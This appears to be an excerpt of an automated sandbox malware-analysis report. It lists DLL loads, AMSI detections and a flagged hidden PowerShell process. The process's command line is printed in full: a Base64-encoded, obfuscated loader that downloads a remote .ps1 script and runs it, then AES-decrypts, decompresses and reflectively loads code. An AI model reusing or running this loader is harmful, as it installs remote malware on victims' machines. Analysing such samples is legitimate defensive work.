                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                Data Obfuscation

                barindex
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VV